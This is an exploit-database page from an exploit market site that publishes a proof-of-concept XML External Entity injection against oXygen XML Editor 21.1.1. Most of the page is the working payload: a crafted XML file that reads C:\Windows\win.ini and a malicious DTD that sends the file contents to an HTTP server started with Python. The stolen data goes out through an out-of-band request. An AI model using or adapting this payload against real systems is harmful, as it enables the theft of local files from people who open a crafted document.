[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

oXygen XML Editor 21.1.1 - XML External Entity Injection Vulnerability

Author
Pablo Santiago
Risk
[
Security Risk Low
]
0day-ID
0day-ID-33542
Category
local exploits
Date add
14-11-2019
Platform
windows
# Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection
# Author: Pablo Santiago
# Vendor Homepage: https://www.oxygenxml.com/
# Source:https://www.oxygenxml.com/xml_editor/download_oxygenxml_editor.html
# Version: 21.1.1
# CVE : N/A
# Tested on: Windows 7

#PoC

1- python -m SimpleHTTPServer 8000
1.1- Poc.xml :
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

1.2.- payload.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;
2- File -> Open -> *.xml

#PoC Visual
https://imgur.com/2H8DhL9

#  0day.today [2024-12-24]  #